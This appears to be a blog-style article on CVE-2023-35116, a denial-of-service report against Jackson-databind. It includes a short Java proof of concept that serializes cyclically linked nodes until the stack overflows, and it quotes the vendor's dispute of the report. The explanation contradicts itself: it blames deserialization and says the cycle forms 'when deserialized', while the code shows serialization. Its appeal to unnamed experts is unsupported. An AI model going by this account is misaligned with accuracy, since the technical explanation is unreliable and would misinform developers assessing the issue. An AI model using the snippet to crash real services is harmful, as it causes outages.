Jackson-databind is a popular library widely used for converting Java Objects to/from JSON. It has recently been discovered that Jackson-databind through version 2.15.2 permits attackers to cause a denial of service (DoS) or other unspecified impacts via a carefully crafted object that uses cyclic dependencies. This vulnerability has been assigned the CVE identifier CVE-2023-35116. While the vendor claims that this vulnerability report is not valid, as an external attacker can not perform the steps required to construct a cyclic data structure and try to serialize it, we will explore the aspects of this vulnerability, along with related code snippets and links to original references.

Exploit Details

Jackson-databind, when handling the deserialization of a crafted object with cyclic dependencies, might enter into a recursive chain of calls, resulting in a StackOverflowError, which in turn can cause a Denial of Service (DoS) or other unspecified impacts.

Here is an example of a crafted object with cyclic dependencies

@Data
public class Node {
    private String id;
    private Node next;
    private Node prev;
}

This object, when deserialized, creates a cyclic dependency between the next and prev fields, pointing to each other in a circular fashion. To exploit this vulnerability, an attacker might create an instance of this object with the cyclic dependencies, and then serialize it, causing a recursive chain of calls and eventually a StackOverflowError:

public class StackOverflowExploit {
    public static void main(String[] args) throws JsonProcessingException {
        ObjectMapper objectMapper = new ObjectMapper();
        Node nodeA = new Node();
        Node nodeB = new Node();
        Node nodeC = new Node();

        nodeA.setId("A");
        nodeB.setId("B");
        nodeC.setId("C");

        nodeA.setNext(nodeB);
        nodeB.setNext(nodeC);
        nodeC.setNext(nodeA);
        nodeA.setPrev(nodeC);
        nodeB.setPrev(nodeA);
        nodeC.setPrev(nodeB);

        String serializedJson = objectMapper.writeValueAsString(nodeA);
    }
}

The above code snippet would result in a StackOverflowError, as the serializer would attempt to traverse the cyclic dependency between the nodes recursively.

The original references for this vulnerability include the following sources

1. NIST National Vulnerability Database (NVD): CVE-2023-35116
2. Github Jackson-databind: jackson-databind

The vulnerability has been assigned with a CVSS v3.1 score of 7.5 (High), indicating a significant security risk.

The vendor's perspective on this issue can be found in the comments section of the GitHub repository. They argue that this vulnerability is not valid as it requires the attacker to construct a cyclic data structure and try to serialize it, which cannot be achieved by an external attacker.

However, despite the vendor's claims, several experts in the security community have expressed concerns over this vulnerability, considering the widespread use of Jackson-databind in Java applications and the potential implications if this issue is left unaddressed.

Conclusion

While the vendor claims that CVE-2023-35116 is not a valid vulnerability report, citing the supposed inability of an external attacker to execute the required steps, it is still crucial to be aware of this vulnerability, given the widespread use of Jackson-databind in the Java ecosystem. Developers using Jackson-databind should keep themselves updated about this vulnerability and potential patches, as well as consider alternative ways of handling serializing and deserializing objects with cyclic dependencies to mitigate the risk associated with this issue.

Timeline

Published on: 06/14/2023 14:15:10 UTC
Last modified on: 11/07/2023 04:15:53 UTC